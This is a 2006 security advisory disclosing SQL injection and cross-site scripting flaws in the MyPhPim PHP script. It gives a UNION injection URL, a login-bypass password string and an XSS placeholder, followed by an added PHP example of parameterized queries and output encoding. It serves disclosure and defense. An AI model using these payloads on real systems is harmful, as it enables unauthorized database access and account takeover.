Multiple SQL Injection and XSS in MyPhPim

Summary

Vulnerability: Multiple SQL Injection and XSS in MyPhPim
Discovered: 2006.01.11
Last Update: 0 n/a
ID: EV0022
CVE: CVE-2006-0167 CVE-2006-0168
Risk Level: medium
Type: Multiple Vulnerabilities
Status: Unpatched
Vendor: n/a
Vulnerable Software: MyPhPim (http://sourceforge.net/projects/myphpim/)
Version: 01.05
PoC/Exploit: Available
Solution: Not available
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)

Description

Multiple vulnerabilities were found in the MyPhPim (http://sourceforge.net/projects/myphpim/) script.

None of the user-defined data is properly sanitized. This can be used to run any SQL query by injecting arbitrary SQL code, or to insert any JavaScript code.

PoC/Exploit

SQL Injection Examples:

URL: http://host/myphpim/calendar.php3?menu=detail&cal_id=999%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*

Login page:
login: [first registered user]
pass: a") or "a"="a"/*

Cross-Site Scripting Example:

Create New todo For [user] Page:
Description value: <XSS>

Solution

A solution for "Multiple SQL Injection and XSS in MyPhPim" is not available. Check the vendor's website for updates.
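
An added example, not taken from MyPhPim or from this advisory's author, of the input handling whose absence the description reports: a validated and bound cal_id, a login check that never places the password in SQL, and HTML encoding of the todo description. The schema, the function names and the in-memory SQLite database are assumptions made for illustration.

```php
<?php
declare(strict_types=1);
// Added example, not MyPhPim code. Schema and function names are hypothetical;
// an in-memory SQLite database stands in for the application's database.

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE calendar (cal_id INTEGER PRIMARY KEY, title TEXT)');
$db->exec('CREATE TABLE users (login TEXT PRIMARY KEY, pass_hash TEXT)');
$db->exec("INSERT INTO calendar VALUES (1, 'Team meeting')");
$seed = $db->prepare('INSERT INTO users VALUES (?, ?)');
$seed->execute(['alice', password_hash('constructed-sample-pw', PASSWORD_DEFAULT)]);

// cal_id is a numeric key: accept only a plain positive integer, then bind it
// as a typed parameter so it is never parsed as part of the SQL text.
function fetchCalendarEntry(PDO $db, string $rawCalId): ?array
{
    $calId = filter_var($rawCalId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($calId === false) {
        return null;
    }
    $stmt = $db->prepare('SELECT cal_id, title FROM calendar WHERE cal_id = :id');
    $stmt->bindValue(':id', $calId, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Login: fetch the stored hash with a bound parameter and compare in PHP,
// so the submitted password never becomes part of the query.
function checkLogin(PDO $db, string $login, string $password): bool
{
    $stmt = $db->prepare('SELECT pass_hash FROM users WHERE login = :login');
    $stmt->execute([':login' => $login]);
    $hash = $stmt->fetchColumn();
    return is_string($hash) && password_verify($password, $hash);
}

// Todo description: store it as submitted, encode it when writing it into HTML.
function renderTodoDescription(string $description): string
{
    return htmlspecialchars($description, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Inputs modelled on the advisory's examples (the union string is shortened).
var_dump(fetchCalendarEntry($db, '1'));                       // numeric id
var_dump(fetchCalendarEntry($db, '999 union select 1,2,3'));  // non-numeric id
var_dump(checkLogin($db, 'alice', 'a") or "a"="a"/*'));       // quote-breaking password
echo renderTodoDescription('<XSS>'), "\n";                    // markup in description
```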